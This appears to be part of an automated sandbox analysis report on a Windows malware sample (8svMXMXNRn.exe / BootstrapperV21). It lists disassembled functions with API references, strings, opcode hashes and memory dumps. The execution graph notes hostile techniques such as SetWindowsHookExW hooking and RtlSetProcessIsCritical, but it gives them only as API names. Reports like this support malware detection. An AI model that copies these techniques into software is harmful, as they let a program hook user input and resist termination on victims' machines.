                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1077098981-0
                                                                                          • Opcode ID: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                                          • Instruction ID: fc705af030516659f3c9e76b7f41cc199d4b9a660a6258de4e1a968d52443e0b
                                                                                          • Opcode Fuzzy Hash: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                                          • Instruction Fuzzy Hash: 08517C32A1DB4286FB408F62E4447AE73A5FB88B95F501036EA4E97B58DF3CE504DB40
                                                                                          Function 00007FF6373CDB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 4141327611-0
                                                                                          • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                          • Instruction ID: b9991712e9c93d615ca39f846c3c4f57fc118568f391e6535545a55b0449985e
                                                                                          • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                          • Instruction Fuzzy Hash: 4E41B332E2C76346FB619B1091403B9B2A0EF80B92F14C131EB9D96BD5DF7CE841A741
                                                                                          Function 00007FF6373A3980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 3823481717-0
                                                                                          • Opcode ID: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                                                                                          • Instruction ID: f93c90e8794b699b6e230e734332f9d6a0f1eead8b56759017a80aaecfd180d1
                                                                                          • Opcode Fuzzy Hash: 23c5bd100aa8ad673c958e7e4297408591e81b8e6a21f45797f9c77ad4370286
                                                                                          • Instruction Fuzzy Hash: D6418062F18B6284FF00CBB5E8451AC2371BF49B94B105235DE5D97B99DF78D445D300
                                                                                          Function 00007FF6373CD440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$abort
                                                                                          • String ID:
                                                                                          • API String ID: 1447195878-0
                                                                                          • Opcode ID: a46f80a814de90fc6a6f27f4ba991d7ab4b28824e48526204554d6c2ee2a7ff7
                                                                                          • Instruction ID: 559e1cd674741c036258d2c69f8ec09ff50b0e50831ad14f713c62fbca94c150
                                                                                          • Opcode Fuzzy Hash: a46f80a814de90fc6a6f27f4ba991d7ab4b28824e48526204554d6c2ee2a7ff7
                                                                                          • Instruction Fuzzy Hash: 3A01B121F1D76742FA586731A65517821A19F84792F044478EA1EDABE6ED3CF8057600
                                                                                          Function 00007FF6373B8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                          • Instruction ID: ef9af0fe3583aee032c262fef069d8b00a0a31c39a33f4ab2ba788e976b07fb2
                                                                                          • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                          • Instruction Fuzzy Hash: 45E01260E4E70682FF186F726C5953621D1AF48792F48443EC81FC6360ED3CE095E710
                                                                                          Function 00007FF63739E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                          • String ID: DXGIDebug.dll
                                                                                          • API String ID: 3668304517-540382549
                                                                                          • Opcode ID: 72a1ff086770173f233fbcd02f84085f3ff3fd6d4eefdb5c79e90c3e0c9a485d
                                                                                          • Instruction ID: cf44d1bb467413ce49beb07ea4f90ba092eea65fb023daa689f0a27262cd0862
                                                                                          • Opcode Fuzzy Hash: 72a1ff086770173f233fbcd02f84085f3ff3fd6d4eefdb5c79e90c3e0c9a485d
                                                                                          • Instruction Fuzzy Hash: D0719C73A19B8186EB14CB25E8403ADB3A9FB58794F444235DFAD47BA9DF78E061D300
                                                                                          Function 00007FF6373CE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: e+000$gfff
                                                                                          • API String ID: 3215553584-3030954782
                                                                                          • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                          • Instruction ID: 9f7dd1f152a479f1f5d406c2a642a5532fb78163abb3726c4c007660c19490bc
                                                                                          • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                          • Instruction Fuzzy Hash: 50512362F1D7E686F7258B35994136D6B91AB80B90F089235CAACC7BD6CF3DE444D700
                                                                                          Function 00007FF6373A9408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                          • String ID: SIZE
                                                                                          • API String ID: 449872665-3243624926
                                                                                          • Opcode ID: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                                                                                          • Instruction ID: 8b9320547ba44e51712d3d6f4c9dea265627c9d443fde9651f44518c32cf7d15
                                                                                          • Opcode Fuzzy Hash: 6775c6e5e0b050535fa3d5d92d2e2625b9409ae7efec724ba4f308c615c90b07
                                                                                          • Instruction Fuzzy Hash: F941B2A2E2C78685FE50DB24E4463BE6360EF96790F504231EA9D96BD6EE3CE540D700
                                                                                          Function 00007FF6373CC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                          • String ID: C:\Users\user\Desktop\8svMXMXNRn.exe
                                                                                          • API String ID: 3307058713-1342674989
                                                                                          • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                          • Instruction ID: e121f1cbf75d464e1e19ed2339a2da0d75f768fdfe3bfc6d7121b4e5e4b0dc69
                                                                                          • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                          • Instruction Fuzzy Hash: E7416936E1CA678AFB159F25A8400B877E4EF84BD5B444036EA4EC7B95DE3DE441E700
                                                                                          Function 00007FF6373B9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemText$DialogWindow
                                                                                          • String ID: ASKNEXTVOL
                                                                                          • API String ID: 445417207-3402441367
                                                                                          • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                          • Instruction ID: 4857ca008c4c63b2ab23f133d6964f91fe7efa0e4a5d074fa01d3927f0a435b3
                                                                                          • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                          • Instruction Fuzzy Hash: 2B41A422F0CA8681FA509B16E5942B923A1EF96BC0F540035EE8D977A9DF3DF851A740
                                                                                          Function 00007FF6373A9638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_snwprintf
                                                                                          • String ID: $%s$@%s
                                                                                          • API String ID: 2650857296-834177443
                                                                                          • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                          • Instruction ID: 9aeee1a447c1ce65793af94f81365fc56b734ef177cdea114a370f0bd4124dc0
                                                                                          • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                          • Instruction Fuzzy Hash: 9031C172B1DA5A86FE508F66E4416E923A0FF44784F401032EE0DA7BA5EE3DE505D740
                                                                                          Function 00007FF6373CEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID: @
                                                                                          • API String ID: 3000768030-2766056989
                                                                                          • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                          • Instruction ID: b9528a76e08d057b4274a5592e0de7c156c61822a848d93f7bdd10931d9a9c0e
                                                                                          • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                          • Instruction Fuzzy Hash: EB21B422E4DBA381FB648B2594901392691EB45BB5F281335D66F877D8CF3DE881F301
                                                                                          Function 00007FF6373C4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6373C1D3E), ref: 00007FF6373C40BC
                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6373C1D3E), ref: 00007FF6373C4102
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                          • String ID: csm
                                                                                          • API String ID: 2573137834-1018135373
                                                                                          • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                          • Instruction ID: 67b7081918ded47bad58bf063182bd9439297545fcb77c0107459cc61b02fb67
                                                                                          • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                          • Instruction Fuzzy Hash: 08112832A08B9182FB608B15E84026ABBA1FB88B94F184231DE8D47768DF3DD555DB00
                                                                                          Function 00007FF6373AEA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6373AE95F,?,?,?,00007FF6373A463A,?,?,?), ref: 00007FF6373AEA63
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6373AE95F,?,?,?,00007FF6373A463A,?,?,?), ref: 00007FF6373AEA6E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastObjectSingleWait
                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                          • API String ID: 1211598281-2248577382
                                                                                          • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                          • Instruction ID: 63d90242c21ccd4026442da85a35f29ef23beb595d8f22c4b5e7773537bba6db
                                                                                          • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                          • Instruction Fuzzy Hash: E1E04666E1D80291F600A725AC829B92260BFA17B0F900330D03EC13F1EF3CB989A705
                                                                                          Function 00007FF6373AA43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindHandleModuleResource
                                                                                          • String ID: RTL
                                                                                          • API String ID: 3537982541-834975271
                                                                                          • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                          • Instruction ID: 358e364b11db062a425ae3850cb463c0751eabc22411704f13875100619edda5
                                                                                          • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                          • Instruction Fuzzy Hash: 01D05E91F0D64282FF194B72A44A37422509F18B41F488038C80E863A0EF3CE18CE759

                                                                                          Execution Graph

                                                                                          Execution Coverage:20.6%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:14
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 13446 7ff848c431ad 13447 7ff848c431bf 13446->13447 13452 7ff848c414e0 13447->13452 13451 7ff848c4320b 13454 7ff848c414e9 SetWindowsHookExW 13452->13454 13455 7ff848c431fb 13454->13455 13456 7ff848c414f0 13455->13456 13458 7ff848c414ec 13456->13458 13457 7ff848c4152a 13457->13451 13458->13457 13459 7ff848c44ba2 SetWindowsHookExW 13458->13459 13460 7ff848c44be1 13459->13460 13460->13451 13461 7ff848c4302d 13462 7ff848c4305f RtlSetProcessIsCritical 13461->13462 13464 7ff848c43112 13462->13464

                                                                                          Executed Functions

                                                                                          Function 00007FF848C55FC9 Relevance: 2.8, Strings: 1, Instructions: 1543COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.4887612530.00007FF848C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ff848c40000_BootstrapperV21.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: t
                                                                                          • API String ID: 0-2238339752
                                                                                          • Opcode ID: 10b5f93f2fbf6749fe9a9eec2b869ebbc21a0cc8219260f359b2c0705acb125b
                                                                                          • Instruction ID: 9a324517f15bf99214c3e4954272180b7fae9783db581e92d5d9ff42b962a05b
                                                                                          • Opcode Fuzzy Hash: 10b5f93f2fbf6749fe9a9eec2b869ebbc21a0cc8219260f359b2c0705acb125b
                                                                                          • Instruction Fuzzy Hash: F5D23D70D096298FEBA5DF29C894BF9B7B1FF54385F1041A9D00DA3295CB38AA85CF44
                                                                                          Function 00007FF848C4DE30 Relevance: .8, Instructions: 759COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
